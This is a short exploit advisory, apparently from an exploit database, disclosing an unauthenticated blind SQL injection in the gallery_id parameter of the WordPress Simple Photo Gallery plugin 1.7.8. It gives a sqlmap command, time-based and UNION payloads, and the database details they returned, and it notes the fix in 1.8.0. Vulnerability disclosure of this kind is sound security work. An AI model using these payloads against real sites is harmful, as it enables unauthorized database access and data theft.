# Exploit Title: Wordpess Simple Photo Gallery Blind SQL Injection
# Date: 12-05-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/simple-photo-gallery/
# Version: 1.7.8
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/122374
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/8000
# Category: webapps
1. Description
Unauthenticated Blind SQL Injection via gallery_id field.
2. Proof of Concept
http://localhost/wordpress/index.php/wppg_photogallery/wppg_photo_details/?gallery_id=1&image_id=14
./sqlmap.py --dbms=MYSQL --technique T -u http://localhost/wordpress/index.php/wppg_photogallery/wppg_photo_details/?gallery_id=1&image_id=14
sqlmap identified the following injection points with a total of 60 HTTP(s) requests:
---
Parameter: gallery_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gallery_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QBzh)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: gallery_id=1 UNION ALL SELECT CONCAT(0x7176787071,0x76576b586376794b756d,0x71707a7171)--
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.12
banner: '5.5.43-0ubuntu0.12.04.1'
current user: 'wordpress@localhost'
current database: 'wordpress'
---
3. Solution
Fixed in version 1.8.0